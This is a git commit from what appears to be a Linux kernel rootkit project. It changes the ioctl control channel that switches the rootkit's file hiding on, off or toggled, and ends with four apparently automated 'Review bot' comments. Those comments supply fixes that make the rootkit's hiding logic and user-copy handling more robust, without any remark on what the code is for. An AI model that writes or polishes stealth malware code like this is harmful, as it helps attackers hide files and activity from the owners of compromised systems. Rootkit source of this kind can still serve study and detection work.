
commit e884f82e538738d503e651f77edc6e56a896951f
parent 78d60743f7d078d219f8d01dfefd43b664f1105c
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 27 Nov 2020 08:52:48 +0100

implements filehide {toggle,on,off} for arg{=0,>0,<0}

Diffstat:
Msrc/channel.c | 16++++++++++++----
Msrc/g7.c | 2+-
Msrc/rkctl/rkctl.c | 4++--
Msrc/rkctl/rkctl.h | 2+-
4 files changed, 16 insertions(+), 8 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -39,6 +39,9 @@ detect_channel(unsigned cmd)
 int
 handle_ping(unsigned long arg)
 {
+	if (!(const char *)arg)
+		return -ENOTTY;
+
 	copy_from_user(buf, (const char *)arg, BUFLEN);
 	if (!strcmp("PING", buf)) {
 		buf[1] = 'O';
@@ -51,14 +54,19 @@ handle_ping(unsigned long arg)
 int
 handle_filehide(unsigned long arg)
 {
-	bool set;
+	long sarg = (long)arg;
+	bool set = rootkit.hiding_files;
 
-	if ((set = rootkit.hiding_files ^= 1))
+	if (sarg > 0 || !sarg && (set ^ 1)) {
 		hide_files();
-	else
+		rootkit.hiding_files = 1;
+	} else if (sarg < 0 || !sarg && !(set ^ 1)) {
 		unhide_files();
+		rootkit.hiding_files = 0;
+	}
 
-	DEBUG_NOTICE("filehide toggled %s", set ? "on" : "off");
+	DEBUG_NOTICE("filehide toggled %s",
+		rootkit.hiding_files ? "on" : "off");
 
 	return 0;
 }
diff --git a/src/g7.c b/src/g7.c
@@ -81,7 +81,7 @@ g7_ioctl(struct file *_file, unsigned cmd, unsigned long arg)
 	channel_t c = detect_channel(cmd);
 	DEBUG_NOTICE("[g7_ioctl] on %#10x (%s)\n", cmd, c.name);
 
-	if (((const char *)arg) && c.handler)
+	if (c.handler)
 		return c.handler(arg);
 	else
 		return -ENOTTY;
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -75,7 +75,7 @@ handle_ping(void *arg)
 int
 handle_filehide(void *arg)
 {
-	return issue_ioctl(G7_FILEHIDE, (char *)arg);
+	return issue_ioctl(G7_FILEHIDE, (const char *)arg);
 }
 
 int
@@ -94,7 +94,7 @@ handle_hidepid(void *arg)
 
 
 int
-issue_ioctl(unsigned long request, char *argp)
+issue_ioctl(unsigned long request, const char *argp)
 {
 	int fd;
 	char device[BUFLEN];
diff --git a/src/rkctl/rkctl.h b/src/rkctl/rkctl.h
@@ -17,7 +17,7 @@ typedef struct {
 } cmd_t;
 
 cmd_t parse_input(int, char **);
-int issue_ioctl(unsigned long, char *);
+int issue_ioctl(unsigned long, const char *);
 void help();
 
 int handle_ping(void *);
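Review bot: The NULL test added at the top of handle_ping does not substitute for checking the return value of the copy_from_user call right below it, which is still ignored; copy_from_user already fails for NULL and for any other unmapped user address, and a failed or partial copy leaves buf holding stale bytes that strcmp then compares. Nothing in the hunk NUL-terminates buf either, so a user buffer of BUFLEN non-zero bytes lets strcmp run past its end (buf's declaration is outside the hunk, presumably a BUFLEN-sized array — confirm). I would replace the two new lines and the copy with `if (strncpy_from_user(buf, (const char __user *)arg, BUFLEN - 1) < 0) return -EFAULT;` followed by `buf[BUFLEN - 1] = '\0';`, which rejects NULL and bad addresses, stops at the user's terminator and bounds the copy. handle_ping's body continues past the end of the hunk.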
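Review bot: The two conditions in handle_filehide lean on `&&` binding tighter than `||` and on `set ^ 1` applied to a bool; gcc's -Wparentheses will flag them and `!set` says the same thing more plainly. More substantively, hide_files() runs every time sarg > 0 even when hiding is already on, and unhide_files() likewise for sarg < 0; both are defined outside this diff, and if they install or remove hooks rather than merely flip state, the repeated call double-applies. Computing the desired state once and only calling into hide/unhide on an actual transition avoids both, and the second `else if`, whose condition is exactly the complement of the first, collapses into the assignment. The DEBUG_NOTICE and return at the end of the function are unaffected.
```c
	long sarg = (long)arg;
	bool set = rootkit.hiding_files;
	/* >0 forces on, <0 forces off, 0 toggles the current state */
	bool want = sarg > 0 || (sarg == 0 && !set);

	if (want && !set)
		hide_files();
	else if (!want && set)
		unhide_files();
	rootkit.hiding_files = want;
	/* … unchanged: DEBUG_NOTICE and return 0 … */
```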
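Review bot: Dropping the `(const char *)arg` test from g7_ioctl means every handler now receives arg unvalidated, NULL included, and within this commit only handle_ping grew a check of its own; any other handler that still copies from arg as a user pointer (handle_hidepid exists on the rkctl side, its kernel counterpart is not in this diff) must check the copy_from_user return itself or it will operate on stale buffer contents. The removal is right, since the integer-valued filehide argument can legitimately be 0, but the contract belongs where handlers are dispatched, e.g. above the `if (c.handler)` line: `/* arg is passed through raw: a handler that treats it as a user pointer must validate it itself (check copy_from_user / strncpy_from_user). */`. g7_ioctl's body begins before this hunk.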
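Review bot: handle_filehide forwards `arg` to issue_ioctl through a `const char *` cast, but after this commit the kernel side reads the same ioctl argument as a signed long (0 toggles, >0 on, <0 off). If parse_input stores a string pointer in the command's arg slot, every user-space address is a large positive value and only the "on" path is ever reachable; if it stores a small integer cast to a pointer, `(const char *)` misdescribes it and `(intptr_t)` would document the intent. parse_input is not in this diff, so I cannot tell which applies; a comment on the call, `/* the kernel reads this as a signed integer, not a string */`, or an integer parameter on issue_ioctl (whose prototype this commit already touches) would make the contract explicit.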